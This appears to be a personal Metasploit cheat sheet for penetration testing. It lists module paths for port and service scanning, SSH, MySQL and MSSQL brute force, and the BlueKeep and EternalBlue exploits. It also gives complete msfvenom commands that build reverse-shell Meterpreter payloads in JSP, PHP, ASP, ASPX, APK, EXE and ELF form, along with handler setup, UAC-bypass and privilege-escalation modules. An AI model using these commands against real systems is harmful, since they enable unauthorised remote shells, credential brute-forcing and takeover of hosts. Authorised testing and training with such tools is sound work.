MSF

Port / service modules
    ARP scan
        auxiliary/scanner/discovery/arp_sweep
    SMB service scan
        auxiliary/scanner/smb/smb_version
    Port scan
        auxiliary/scanner/portscan/syn
    Telnet service scan
        auxiliary/scanner/telnet/telnet_version
    RDP service scan
        auxiliary/scanner/rdp/rdp_scanner
    SSH host scan
        auxiliary/scanner/ssh/ssh_version
    SSH brute force
        auxiliary/scanner/ssh/ssh_login
    MySQL brute force
        auxiliary/scanner/mysql/mysql_login
    MySQL service scan
        auxiliary/scanner/mysql/mysql_version
    MSSQL brute force
        auxiliary/scanner/mssql/mssql_login
    PostgreSQL
        auxiliary/scanner/postgres/postgres_version
        auxiliary/scanner/postgres/postgres_login
Vulnerability modules
    CVE-2019-0708
        Scanner module
            auxiliary/scanner/rdp/cve_2019_0708_bluekeep
        Exploit module
            exploit/windows/rdp/cve_2019_0708_bluekeep_rce
    MS17-010
        Scanner module
            auxiliary/scanner/smb/smb_ms17_010
        Exploit module
            exploit/windows/smb/ms17_010_eternalblue
    CVE-2012-2122
        auxiliary/admin/mysql/mysql_enum
Shell generation (msfvenom)
    jsp
        msfvenom -p java/jsp_shell_reverse_tcp LHOST=[ip] LPORT=[Port] -f raw > text.jsp
    php
        msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 -f raw > text.php
    asp
        msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 -f asp > shell.asp
    aspx
        msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=7788 -f aspx > /home/niexinming/back.aspx
    apk
        msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 -f raw > text.apk
    exe
        msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=44444 -f exe > test.exe
    Linux
        msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 -f elf > text
Reverse shell handler
    exploit/multi/handler
        set payload php/meterpreter/reverse_tcp  (or: set PAYLOAD java/jsp_shell_reverse_tcp, matching the payload used above)
Privilege escalation modules
    MySQL privilege escalation
        UDF privilege escalation
            The exploit Metasploit provides applies to versions below 5.5.9
        MOF privilege escalation
            exploit/windows/mysql/mysql_mof
    UAC bypass
        exploit/windows/local/bypassuac
        exploit/windows/local/bypassuac_fodhelper
        exploit/windows/local/bypassuac_comhijack
        exploit/windows/local/bypassuac_eventvwr
    Privilege escalation via add_localgroup_user in incognito
    Domain privilege escalation
        ms13-081, ms15-051, ms16-032, MS16-016, MS14-068, ms18_8120_win32k_privesc
Troubleshooting
    (1) [-] Handler failed to bind to 192.168.1.211:4444:- -> restart msf